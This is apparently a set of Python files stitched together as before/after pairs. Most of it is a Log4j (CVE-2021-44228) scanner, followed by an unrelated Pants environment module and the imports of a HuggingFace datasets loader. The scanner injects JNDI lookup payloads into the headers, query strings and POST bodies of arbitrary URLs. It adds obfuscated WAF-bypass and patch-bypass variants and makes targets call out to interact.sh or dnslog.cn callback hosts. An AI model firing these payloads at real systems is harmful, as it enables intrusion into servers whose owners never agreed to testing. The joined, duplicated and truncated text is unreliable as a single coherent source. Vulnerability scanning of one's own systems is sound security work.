    polls the service for DNS interaction records."""

    def __init__(self):
        self.s = requests.session()
        resp = self.s.get("http://www.dnslog.cn/getdomain.php",
                          proxies=proxies,
                          timeout=30)
        # The response body is the bare domain to embed in payloads.
        self.domain = resp.text

    def pull_logs(self):
        """Return the DNS records logged against our domain so far."""
        resp = self.s.get("http://www.dnslog.cn/getrecords.php",
                          proxies=proxies,
                          timeout=30)
        return resp.json()
class Interactsh:
    # Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
    """interact.sh out-of-band DNS callback client.

    Registers an RSA public key with the interact.sh server, derives a
    unique callback domain, and polls/decrypts the interaction logs.
    """

    def __init__(self, token="", server=""):
        # The server encrypts each session AES key with this public key;
        # we hold the private key to decrypt pulled records.
        rsa = RSA.generate(2048)
        self.public_key = rsa.publickey().exportKey()
        self.private_key = rsa.exportKey()
        self.token = token
        self.server = server.lstrip('.') or 'interact.sh'
        self.headers = {
            "Content-Type": "application/json",
        }
        if self.token:
            self.headers['Authorization'] = self.token
        self.secret = str(uuid4())
        self.encoded = b64encode(self.public_key).decode("utf8")
        # Build a random-looking 33-char subdomain; its first 20 characters
        # double as the correlation id the server expects.
        guid = uuid4().hex.ljust(33, 'a')
        guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
        self.domain = f'{guid}.{self.server}'
        self.correlation_id = self.domain[:20]
        self.session = requests.session()
        self.session.headers = self.headers
        self.session.verify = False
        self.session.proxies = proxies
        self.register()

    def register(self):
        """Register the public key / secret with the interact.sh server."""
        data = {
            "public-key": self.encoded,
            "secret-key": self.secret,
            "correlation-id": self.correlation_id
        }
        res = self.session.post(
            f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
        if 'success' not in res.text:
            raise Exception("Can not initiate interact.sh DNS callback client")

    def pull_logs(self):
        """Poll the server and return decrypted, normalized records."""
        result = []
        url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
        res = self.session.get(url, headers=self.headers, timeout=30).json()
        aes_key, data_list = res['aes_key'], res['data']
        for i in data_list:
            decrypt_data = self.__decrypt_data(aes_key, i)
            result.append(self.__parse_log(decrypt_data))
        return result

    def __decrypt_data(self, aes_key, data):
        """RSA-decrypt the session AES key, then AES-CFB-decrypt a record."""
        private_key = RSA.importKey(self.private_key)
        cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
        aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
        decode = base64.b64decode(data)
        bs = AES.block_size
        iv = decode[:bs]
        cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
        plain_text = cryptor.decrypt(decode)
        # Drop the leading IV-sized block before parsing the JSON payload.
        return json.loads(plain_text[16:])

    def __parse_log(self, log_entry):
        """Normalize one raw interact.sh record to timestamp/host/address.

        Fix: the original nested single quotes inside a single-quoted
        f-string ('{log_entry['full-id']}') — a SyntaxError before 3.12.
        """
        new_log_entry = {"timestamp": log_entry["timestamp"],
                         "host": f"{log_entry['full-id']}.{self.domain}",
                         "remote_address": log_entry["remote-address"]
                         }
        return new_log_entry
def parse_url(url):
    """
    Parse *url* into its scheme, site root, bare host and file path.

    '#' and ' ' are percent-encoded first so they cannot truncate the URL,
    and a missing scheme defaults to plain HTTP.

    Returns a dict with keys "scheme", "site", "host" and "file_path".
    """
    # Url: https://example.com/login.jsp
    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')
    if ('://' not in url):
        url = str("http://") + str(url)
    # Improvement: parse once instead of re-parsing for every field.
    parsed = urlparse.urlparse(url)
    # FilePath: /login.jsp
    file_path = parsed.path
    if (file_path == ''):
        file_path = '/'
    return({"scheme": parsed.scheme,
            "site": f"{parsed.scheme}://{parsed.netloc}",
            "host": parsed.netloc.split(":")[0],
            "file_path": file_path})
def scan_url(url, callback_host):
    """Send the JNDI payload set to *url* — query string, fuzzed headers,
    form body and JSON body — pointing callbacks at *callback_host*.

    Fix: f-strings below used single quotes around dict keys inside
    single-quoted f-strings, a SyntaxError before Python 3.12; they now use
    double-quoted f-strings.
    """
    parsed_url = parse_url(url)
    # Random marker lets a DNS callback be matched back to this target.
    random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
    payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
    payloads = [payload]
    if args.waf_bypass_payloads:
        payloads.extend(generate_waf_bypass_payloads(f"{parsed_url['host']}.{callback_host}", random_string))
    if args.cve_2021_45046:
        cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
        # CVE-2021-45046 payloads replace (not extend) the default set.
        payloads = get_cve_2021_45046_payloads(f"{parsed_url['host']}.{callback_host}", random_string)
    # NOTE(review): args.cve_2021_45105 / get_cve_2021_45105_payloads are
    # never used here — confirm whether that test was meant to be wired in.
    for payload in payloads:
        cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
        if args.request_type.upper() == "GET" or args.run_all_tests:
            try:
                requests.request(url=url,
                                 method="GET",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
        if args.request_type.upper() == "POST" or args.run_all_tests:
            try:
                # Post body
                requests.request(url=url,
                                 method="POST",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 data=get_fuzzing_post_data(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
            try:
                # JSON body
                requests.request(url=url,
                                 method="POST",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 json=get_fuzzing_post_data(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
def main():
    """Collect target URLs, fire the payloads, then poll the DNS callback
    provider for hits (skipped when a custom callback host is supplied)."""
    urls = []
    if args.url:
        urls.append(args.url)
    if args.usedlist:
        with open(args.usedlist, "r") as url_file:
            for raw_line in url_file:
                candidate = raw_line.strip()
                if candidate == "" or candidate.startswith("#"):
                    continue
                urls.append(candidate)
    dns_callback_host = ""
    if args.custom_dns_callback_host:
        cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
        dns_callback_host = args.custom_dns_callback_host
    else:
        cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
        if args.dns_callback_provider == "interact.sh":
            dns_callback = Interactsh()
        elif args.dns_callback_provider == "dnslog.cn":
            dns_callback = Dnslog()
        else:
            raise ValueError("Invalid DNS Callback provider")
        dns_callback_host = dns_callback.domain
    cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
    for url in urls:
        cprint(f"[•] URL: {url}", "magenta")
        scan_url(url, dns_callback_host)
    # With a custom callback host there is nothing to poll here.
    if args.custom_dns_callback_host:
        cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
        return
    cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan")
    cprint("[•] Waiting...", "cyan")
    time.sleep(int(args.wait_time))
    records = dns_callback.pull_logs()
    if not records:
        cprint("[•] Targets does not seem to be vulnerable.", "green")
    else:
        cprint("[!!!] Target Affected", "yellow")
        for record in records:
            cprint(record, "yellow")
if __name__ == "__main__":
    # Script entry point: run the scan and exit quietly on Ctrl-C.
    try:
        main()
    except KeyboardInterrupt:
        print("\nKeyboardInterrupt Detected.")
        print("Exiting...")
        exit(0)
| #!/usr/bin/env python3
# coding=utf-8
# ******************************************************************
# log4j-scan: A generic scanner for Apache log4j RCE CVE-2021-44228
# Original Author:
# Mazin Ahmed <Mazin at FullHunt.io>
# Modified by Megan Howell (CyberQueenMeg)
# Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
# Secure your Attack Surface with FullHunt.io.
# ******************************************************************
import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
import random
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
# Disable SSL warnings
# (requests is used with verify=False throughout; silence urllib3's noise)
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
# Nothing to scan without arguments; point the user at --help.
if len(sys.argv) <= 1:
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)
# Baseline headers for every request; individual header values are
# overwritten with the payload during header fuzzing.
default_headers = {
    'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
    'Accept': '*/*'  # not being tested to allow passing through checks on Accept header in older web-servers
}
# POST form/JSON parameter names that receive the payload.
post_data_parameters = ["username", "user", "email", "email_address", "password"]
# Per-request timeout in seconds.
timeout = 4
# Obfuscated JNDI payload templates for --waf-bypass;
# {{callback_host}} and {{random}} are substituted before sending.
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
                       "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
                       "${jndi:rmi://{{callback_host}}}",
                       "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
                       "${jndi:dns://{{callback_host}}}",
                       ]
# Detection payloads for the CVE-2021-45046 patch bypass (--test-CVE-2021-45046).
cve_2021_45046 = [
    "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}",  # Source: https://twitter.com/marcioalm/status/1471740771581652995,
    "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
    "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
# Detection payload for CVE-2021-45105 (context lookup DoS).
cve_2021_45105 = [
    "$${ctx:loginId}"
]
# Command-line interface definition.
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
parser.add_argument("-p", "--proxy",
                    dest="proxy",
                    help="send requests through proxy",
                    action='store')
parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
parser.add_argument("--request-type",
                    dest="request_type",
                    help="Request Type: (get, post) - [Default: get].",
                    default="get",
                    action='store')
parser.add_argument("--headers-file",
                    dest="headers_file",
                    help="Headers fuzzing list - [default: headers.txt].",
                    default="headers.txt",
                    action='store')
parser.add_argument("--run-all-tests",
                    dest="run_all_tests",
                    help="Run all available tests on each URL.",
                    action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
                    dest="exclude_user_agent_fuzzing",
                    help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
                    action='store_true')
parser.add_argument("--wait-time",
                    dest="wait_time",
                    help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
                    default=5,
                    type=int,
                    action='store')
parser.add_argument("--waf-bypass",
                    dest="waf_bypass_payloads",
                    help="Extend scans with WAF bypass payloads.",
                    action='store_true')
parser.add_argument("--test-CVE-2021-45046",
                    dest="cve_2021_45046",
                    help="Test using payloads for CVE-2021-45046 (detection payloads).",
                    action='store_true')
parser.add_argument("--test-CVE-2021-45105",
                    dest="cve_2021_45105",
                    help="Test using payloads for CVE-2021-45105 (detection payloads).",
                    action='store_true')
parser.add_argument("--dns-callback-provider",
                    dest="dns_callback_provider",
                    help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
                    default="interact.sh",
                    action='store')
parser.add_argument("--custom-dns-callback-host",
                    dest="custom_dns_callback_host",
                    help="Custom DNS Callback Host.",
                    action='store')
parser.add_argument("--disable-http-redirects",
                    dest="disable_redirects",
                    help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
                    action='store_true')
# Parse once at import time; the rest of the module reads this global.
args = parser.parse_args()
# Optional HTTP/HTTPS proxy applied to every outgoing request.
proxies = {}
if args.proxy:
    proxies = {"http": args.proxy, "https": args.proxy}
def get_fuzzing_headers(payload):
    """Build the header set used to fuzz a single request.

    Starts from ``default_headers`` and sets every header name listed in
    ``args.headers_file`` (one per line; blank lines and '#' comments are
    skipped) to *payload*.  Honors ``--exclude-user-agent-fuzzing`` and,
    when a Referer header is being fuzzed, rewrites it into URL form so it
    passes basic Referer validation on the target.

    Args:
        payload: JNDI payload string to inject into each fuzzed header.

    Returns:
        dict mapping header name -> header value.
    """
    fuzzing_headers = dict(default_headers)
    with open(args.headers_file, "r") as f:
        for line in f:
            header = line.strip()
            if header == "" or header.startswith("#"):
                continue
            fuzzing_headers[header] = payload
    if args.exclude_user_agent_fuzzing:
        fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
    # FIX: the original read fuzzing_headers["Referer"] unconditionally and
    # raised KeyError whenever the headers file did not list "Referer".
    if "Referer" in fuzzing_headers:
        fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
    return fuzzing_headers
def get_fuzzing_post_data(payload):
    """Return the POST body fields, every fuzzed parameter set to *payload*."""
    return {param: payload for param in post_data_parameters}
def generate_waf_bypass_payloads(callback_host, random_string):
    """Render every WAF-bypass payload template for one target.

    Substitutes the {{callback_host}} and {{random}} placeholders in each
    template from the module-level ``waf_bypass_payloads`` list.
    """
    return [
        template.replace("{{callback_host}}", callback_host)
                .replace("{{random}}", random_string)
        for template in waf_bypass_payloads
    ]
def get_cve_2021_45046_payloads(callback_host, random_string):
    """Render the CVE-2021-45046 detection payloads for one target.

    Substitutes the {{callback_host}} and {{random}} placeholders in each
    template from the module-level ``cve_2021_45046`` list.
    """
    return [
        template.replace("{{callback_host}}", callback_host)
                .replace("{{random}}", random_string)
        for template in cve_2021_45046
    ]
def get_cve_2021_45105_payloads(callback_host, random_string):
    """Render the CVE-2021-45105 detection payloads for one target.

    Substitutes the {{callback_host}} and {{random}} placeholders in each
    template from the module-level ``cve_2021_45105`` list.
    """
    return [
        template.replace("{{callback_host}}", callback_host)
                .replace("{{random}}", random_string)
        for template in cve_2021_45105
    ]
class Dnslog(object):
    """DNS out-of-band callback provider backed by the public dnslog.cn service."""
    def __init__(self):
        # One shared session: dnslog.cn ties the issued domain to the
        # session cookie, so getdomain/getrecords must use the same session.
        self.s = requests.session()
        req = self.s.get("http://www.dnslog.cn/getdomain.php",
                         proxies=proxies,
                         timeout=30)
        # Freshly allocated callback domain (response body is the bare domain).
        self.domain = req.text
    def pull_logs(self):
        """Return the DNS interaction records recorded for this session's domain."""
        req = self.s.get("http://www.dnslog.cn/getrecords.php",
                         proxies=proxies,
                         timeout=30)
        return req.json()
class Interactsh:
    """DNS out-of-band callback provider backed by an interact.sh server.

    Registers a client RSA public key with the server, derives a random
    callback domain, and polls for interactions whose payloads the server
    returns AES-encrypted (AES key wrapped with our RSA key).
    """
    # Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
    def __init__(self, token="", server=""):
        # Fresh RSA keypair per run; the server encrypts the per-poll AES key to it.
        rsa = RSA.generate(2048)
        self.public_key = rsa.publickey().exportKey()
        self.private_key = rsa.exportKey()
        self.token = token
        self.server = server.lstrip('.') or 'interact.sh'
        self.headers = {
            "Content-Type": "application/json",
        }
        if self.token:
            self.headers['Authorization'] = self.token
        self.secret = str(uuid4())
        self.encoded = b64encode(self.public_key).decode("utf8")
        # Random 33-char subdomain label; non-digit hex chars are shifted to
        # widen the alphabet beyond [0-9a-f].
        guid = uuid4().hex.ljust(33, 'a')
        guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
        self.domain = f'{guid}.{self.server}'
        # The correlation id is the domain's first 20 characters (server convention).
        self.correlation_id = self.domain[:20]
        self.session = requests.session()
        self.session.headers = self.headers
        self.session.verify = False
        self.session.proxies = proxies
        self.register()
    def register(self):
        """Register this client's public key / secret with the interact.sh server."""
        data = {
            "public-key": self.encoded,
            "secret-key": self.secret,
            "correlation-id": self.correlation_id
        }
        res = self.session.post(
            f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
        if 'success' not in res.text:
            raise Exception("Can not initiate interact.sh DNS callback client")
    def pull_logs(self):
        """Poll the server and return decrypted interaction records.

        Each record is a dict with "timestamp", "host" and "remote_address".
        """
        result = []
        url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
        res = self.session.get(url, headers=self.headers, timeout=30).json()
        aes_key, data_list = res['aes_key'], res['data']
        for i in data_list:
            decrypt_data = self.__decrypt_data(aes_key, i)
            result.append(self.__parse_log(decrypt_data))
        return result
    def __decrypt_data(self, aes_key, data):
        """Unwrap the AES key with our RSA key, then decrypt one data blob.

        The first AES block of the plaintext is the IV echo and is discarded
        before JSON-decoding.
        """
        private_key = RSA.importKey(self.private_key)
        cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
        aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
        decode = base64.b64decode(data)
        bs = AES.block_size
        # IV is prepended to the ciphertext.
        iv = decode[:bs]
        cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
        plain_text = cryptor.decrypt(decode)
        return json.loads(plain_text[16:])
    def __parse_log(self, log_entry):
        """Normalize one decrypted server record into the fields callers use."""
        new_log_entry = {"timestamp": log_entry["timestamp"],
                         "host": f'{log_entry["full-id"]}.{self.domain}',
                         "remote_address": log_entry["remote-address"]
                         }
        return new_log_entry
def parse_url(url):
    """Split *url* into scheme / site / host / file-path components.

    '#' and ' ' are percent-encoded first so fragments survive into the
    parsed path, and a missing scheme defaults to ``http://``.

    Args:
        url: Target URL, with or without a scheme.

    Returns:
        dict with keys:
            "scheme":    URL scheme ("http"/"https"/...),
            "site":      scheme://netloc,
            "host":      netloc without any :port suffix,
            "file_path": the path component, '/' when empty.
    """
    # Url: https://example.com/login.jsp
    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')
    if ('://' not in url):
        url = str("http://") + str(url)
    # Parse once instead of re-parsing the URL for every component.
    parsed = urlparse.urlparse(url)
    # FilePath: /login.jsp
    file_path = parsed.path
    if (file_path == ''):
        file_path = '/'
    return({"scheme": parsed.scheme,
            "site": f"{parsed.scheme}://{parsed.netloc}",
            "host": parsed.netloc.split(":")[0],
            "file_path": file_path})
def scan_url(url, callback_host):
    """Fire the JNDI payloads at one URL via fuzzed headers, query string,
    POST form and JSON bodies.

    A DNS lookup of <target-host>.<callback_host>/<random> seen later on the
    callback provider proves the target resolved a payload. Request failures
    are printed and ignored (best-effort fuzzing).
    """
    parsed_url = parse_url(url)
    # Random token so callbacks can be correlated to this specific scan run.
    random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
    # Prefix the callback host with the target host so each callback
    # identifies which target triggered it.
    payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
    payloads = [payload]
    if args.waf_bypass_payloads:
        payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
    if args.cve_2021_45046:
        # NOTE(review): this REPLACES the payload list (including any WAF-bypass
        # payloads added above) rather than extending it — confirm intended.
        cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
        payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
    for payload in payloads:
        cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
        # GET: payload in the query string and in every fuzzed header.
        if args.request_type.upper() == "GET" or args.run_all_tests:
            try:
                requests.request(url=url,
                                 method="GET",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
        if args.request_type.upper() == "POST" or args.run_all_tests:
            try:
                # Post body
                requests.request(url=url,
                                 method="POST",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 data=get_fuzzing_post_data(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
            try:
                # JSON body
                requests.request(url=url,
                                 method="POST",
                                 params={"v": payload},
                                 headers=get_fuzzing_headers(payload),
                                 json=get_fuzzing_post_data(payload),
                                 verify=False,
                                 timeout=timeout,
                                 allow_redirects=(not args.disable_redirects),
                                 proxies=proxies)
            except Exception as e:
                cprint(f"EXCEPTION: {e}")
def main():
    """Drive the scan: collect target URLs, set up the DNS callback,
    fuzz every URL, then wait for and report OOB callbacks."""
    # Collect targets from --url and/or --list (blank lines and '#'
    # comments in the list file are skipped).
    urls = []
    if args.url:
        urls.append(args.url)
    if args.usedlist:
        with open(args.usedlist, "r") as f:
            for i in f.readlines():
                i = i.strip()
                if i == "" or i.startswith("#"):
                    continue
                urls.append(i)
    dns_callback_host = ""
    if args.custom_dns_callback_host:
        # User supplied their own callback host: we can't poll it, so no
        # verification happens after the requests are sent.
        cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
        dns_callback_host = args.custom_dns_callback_host
    else:
        cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
        if args.dns_callback_provider == "interact.sh":
            dns_callback = Interactsh()
        elif args.dns_callback_provider == "dnslog.cn":
            dns_callback = Dnslog()
        else:
            raise ValueError("Invalid DNS Callback provider")
        dns_callback_host = dns_callback.domain
    cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
    for url in urls:
        cprint(f"[•] URL: {url}", "magenta")
        scan_url(url, dns_callback_host)
    if args.custom_dns_callback_host:
        # dns_callback is unbound on this path — the early return keeps the
        # pull_logs() call below safe.
        cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
        return
    cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan")
    cprint("[•] Waiting...", "cyan")
    # Give slow targets time to resolve the callback before polling.
    time.sleep(int(args.wait_time))
    records = dns_callback.pull_logs()
    if len(records) == 0:
        cprint("[•] Targets does not seem to be vulnerable.", "green")
    else:
        cprint("[!!!] Target Affected", "yellow")
        for i in records:
            cprint(i, "yellow")
# Script entry point: run the scan, but exit cleanly on Ctrl-C instead of
# dumping a traceback.
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\nKeyboardInterrupt Detected.")
        print("Exiting...")
        exit(0)
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import re
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Sequence
from pants.base.deprecated import deprecated
from pants.util.frozendict import FrozenDict
from pants.util.meta import frozen_after_init
logger = logging.getLogger(__name__)
# "NAME=VALUE" form of an env-var specifier (explicit value override).
name_value_re = re.compile(r"([A-Za-z_]\w*)=(.*)")
# Bare "NAME" shorthand form (value looked up in the ambient environment).
shorthand_re = re.compile(r"([A-Za-z_]\w*)")
@frozen_after_init
@dataclass(unsafe_hash=True)
class PantsEnvironment:
    """PantsEnvironment is a representation of the environment variables the currently-executing
    Pants process was invoked with."""

    # Immutable snapshot of the process environment.
    env: FrozenDict[str, str]

    @deprecated(
        "2.5.0.dev1",
        hint_message="Request a subset Environment (using EnvironmentRequest) or the CompleteEnvironment.",
    )
    def __init__(self, env: Optional[Mapping[str, str]] = None) -> None:
        """Initialize a `PantsEnvironment` with the current contents of the environment.

        Explicitly specify the env argument to create a mock environment for testing.
        """
        self.env = FrozenDict(env or {})

    def get_subset(
        self, requested: Sequence[str], *, allowed: Optional[Sequence[str]] = None
    ) -> FrozenDict[str, str]:
        """Extract a subset of named env vars.

        Given a list of extra environment variable specifiers as strings, filter the contents of
        the pants environment to only those variables.

        Each variable can be specified either as a name or as a name=value pair.
        In the former case, the value for that name is taken from this env. In the latter
        case the specified value overrides the value in this env.

        If `allowed` is specified, the requested variable names must be in that list, or an error
        will be raised.
        """
        allowed_set = None if allowed is None else set(allowed)
        env_var_subset: Dict[str, str] = {}

        def check_and_set(name: str, value: Optional[str]) -> None:
            if allowed_set is not None and name not in allowed_set:
                # FIX: this f-string previously nested double quotes inside a
                # double-quoted f-string ({",".join(...)}), which is a
                # SyntaxError on Python < 3.12; single-quote the separator.
                raise ValueError(
                    f"{name} is not in the list of variable names that are allowed to be set. "
                    f"Must be one of {','.join(sorted(allowed_set))}."
                )
            if value is not None:
                env_var_subset[name] = value

        for env_var in requested:
            name_value_match = name_value_re.match(env_var)
            if name_value_match:
                check_and_set(name_value_match[1], name_value_match[2])
            elif shorthand_re.match(env_var):
                # Shorthand: take the value from this env; absent names are
                # silently skipped (check_and_set ignores a None value).
                check_and_set(env_var, self.env.get(env_var))
            else:
                raise ValueError(
                    f"An invalid variable was requested via the --test-extra-env-var "
                    f"mechanism: {env_var}"
                )
        return FrozenDict(env_var_subset)
| # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import re
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Sequence
from pants.base.deprecated import deprecated
from pants.util.frozendict import FrozenDict
from pants.util.meta import frozen_after_init
logger = logging.getLogger(__name__)
# "NAME=VALUE" form of an env-var specifier (explicit value override).
name_value_re = re.compile(r"([A-Za-z_]\w*)=(.*)")
# Bare "NAME" shorthand form (value looked up in the ambient environment).
shorthand_re = re.compile(r"([A-Za-z_]\w*)")
@frozen_after_init
@dataclass(unsafe_hash=True)
class PantsEnvironment:
    """PantsEnvironment is a representation of the environment variables the currently-executing
    Pants process was invoked with."""

    # Immutable snapshot of the process environment.
    env: FrozenDict[str, str]

    @deprecated(
        "2.5.0.dev1",
        hint_message="Request a subset Environment (using EnvironmentRequest) or the CompleteEnvironment.",
    )
    def __init__(self, env: Optional[Mapping[str, str]] = None) -> None:
        """Initialize a `PantsEnvironment` with the current contents of the environment.

        Explicitly specify the env argument to create a mock environment for testing.
        """
        self.env = FrozenDict(env or {})

    def get_subset(
        self, requested: Sequence[str], *, allowed: Optional[Sequence[str]] = None
    ) -> FrozenDict[str, str]:
        """Extract a subset of named env vars.

        Given a list of extra environment variable specifiers as strings, filter the contents of
        the pants environment to only those variables.

        Each variable can be specified either as a name or as a name=value pair.
        In the former case, the value for that name is taken from this env. In the latter
        case the specified value overrides the value in this env.

        If `allowed` is specified, the requested variable names must be in that list, or an error
        will be raised.
        """
        allowed_set = None if allowed is None else set(allowed)
        env_var_subset: Dict[str, str] = {}

        def check_and_set(name: str, value: Optional[str]):
            # Enforce the allow-list before recording; a None value means the
            # shorthand name was absent from this env and is silently skipped.
            if allowed_set is not None and name not in allowed_set:
                raise ValueError(
                    f"{name} is not in the list of variable names that are allowed to be set. "
                    f"Must be one of {','.join(sorted(allowed_set))}."
                )
            if value is not None:
                env_var_subset[name] = value

        for env_var in requested:
            name_value_match = name_value_re.match(env_var)
            if name_value_match:
                # "NAME=VALUE": the explicit value overrides this env.
                check_and_set(name_value_match[1], name_value_match[2])
            elif shorthand_re.match(env_var):
                # Bare "NAME": value taken from this env, if present.
                check_and_set(env_var, self.env.get(env_var))
            else:
                raise ValueError(
                    f"An invalid variable was requested via the --test-extra-env-var "
                    f"mechanism: {env_var}"
                )
        return FrozenDict(env_var_subset)
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Access datasets."""
import filecmp
import importlib
import inspect
import json
import os
import re
import shutil
import time
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Type, Union
from urllib.parse import urlparse
import fsspec
from . import config
from .arrow_dataset import Dataset
from .builder import DatasetBuilder
from .dataset_dict import DatasetDict, IterableDatasetDict
from .features import Features
from .filesystems import extract_path_from_uri, is_remote_filesystem
from .iterable_dataset import IterableDataset
from .metric import Metric
from .packaged_modules import _PACKAGED_DATASETS_MODULES, hash_python_lines
from .splits import Split
from .tasks import TaskTemplate
from .utils.download_manager import GenerateMode
from .utils.file_utils import (
DownloadConfig,
cached_path,
head_hf_s3,
hf_bucket_url,
hf_github_url,
hf_hub_url,
init_hf_modules,
url_or_path_join,
url_or_path_parent,
)
from .utils.filelock import FileLock
from .utils.info_utils import is_small_dataset
